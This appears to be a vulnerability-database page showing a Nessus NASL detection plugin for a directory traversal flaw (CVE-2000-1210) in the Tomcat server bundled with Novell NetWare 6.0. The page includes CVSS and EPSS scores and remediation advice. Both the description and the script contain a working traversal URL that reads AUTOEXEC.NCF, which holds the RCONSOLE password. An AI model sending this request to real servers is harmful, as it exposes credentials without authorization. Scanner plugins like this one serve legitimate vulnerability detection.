Lucene search

K
nessusThis script is Copyright (C) 2004-2022 David KygerNETWARE_TOMCAT_SOURCECODE_VIEWER.NASL
HistoryMar 30, 2004 - 12:00 a.m.

Novell NetWare 6.0 Tomcat source.jsp Traversal Arbitrary File Access

2004-03-3000:00:00
This script is Copyright (C) 2004-2022 David Kyger
www.tenable.com
32

5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

0.011 Low

EPSS

Percentile

84.4%

The Apache Tomcat server distributed with NetWare 6.0 has a directory traversal vulnerability. As a result, sensitive information could be obtained from the NetWare server, such as the RCONSOLE password located in AUTOEXEC.NCF.

Example :

http://target/examples/jsp/source.jsp?../../../../system/autoexec.ncf

#%NASL_MIN_LEVEL 70300
#
# This script was written by David Kyger <[email protected]>
#
# See the Nessus Scripts License for details
#

# Changes by Tenable:
# - Revised plugin title, added CVE, added solution, output formatting (9/3/09)

include('deprecated_nasl_level.inc');
include('compat.inc');

if (description)
{
  script_id(12119);
  script_version("1.16");
  script_set_attribute(attribute:"plugin_modification_date", value:"2022/04/11");

  script_cve_id("CVE-2000-1210");

  script_name(english:"Novell NetWare 6.0 Tomcat source.jsp Traversal Arbitrary File Access");

  script_set_attribute(attribute:"synopsis", value:
"Sensitive data can be read on the remote data.");
  script_set_attribute(attribute:"description", value:
"The Apache Tomcat server distributed with NetWare 6.0 has a directory 
traversal vulnerability. As a result, sensitive information 
could be obtained from the NetWare server, such as the RCONSOLE 
password located in AUTOEXEC.NCF.

Example : 

http://target/examples/jsp/source.jsp?%2e%2e/%2e%2e/%2e%2e/%2e%2e/system/autoexec.ncf");
  script_set_attribute(attribute:"solution", value:
"Upgrade Tomcat to the latest version, or disable the service
if it is not required.
Remove default files from the web server. Also, ensure the RCONSOLE 
password is encrypted and utilize a password protected screensaver for 
console access.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:N/A:N");

  script_set_attribute(attribute:"vuln_publication_date", value:"2000/03/21");
  script_set_attribute(attribute:"plugin_publication_date", value:"2004/03/30");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:novell:netware");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:apache:tomcat");
  script_set_attribute(attribute:"thorough_tests", value:"true");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_family(english:"Netware");

  script_copyright(english:"This script is Copyright (C) 2004-2022 David Kyger");

  script_dependencies("find_service1.nasl", "http_version.nasl");
  script_require_ports("Services/www", 80);

  exit(0);
}

#
# The script code starts here
#
include("global_settings.inc");
include("http_func.inc");
include("http_keepalive.inc");

warning = "The content of the AUTOEXEC.NCF follows:";

url = "/examples/jsp/source.jsp?%2e%2e/%2e%2e/%2e%2e/%2e%2e/system/autoexec.ncf";
 
port = get_http_port(default:80, embedded:TRUE);

if(get_port_state(port))
 {
   req = http_get(item:url, port:port);
   buf = http_keepalive_send_recv(port:port, data:req);
   if ("SYS:\" >< buf)
    {
     warning = warning + '\n'+ buf + '\n';
     security_hole(port:port, extra:warning);
    }
 }


VendorProductVersionCPE
novellnetwarecpe:/o:novell:netware
apachetomcatcpe:/a:apache:tomcat

5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

0.011 Low

EPSS

Percentile

84.4%

Related for NETWARE_TOMCAT_SOURCECODE_VIEWER.NASL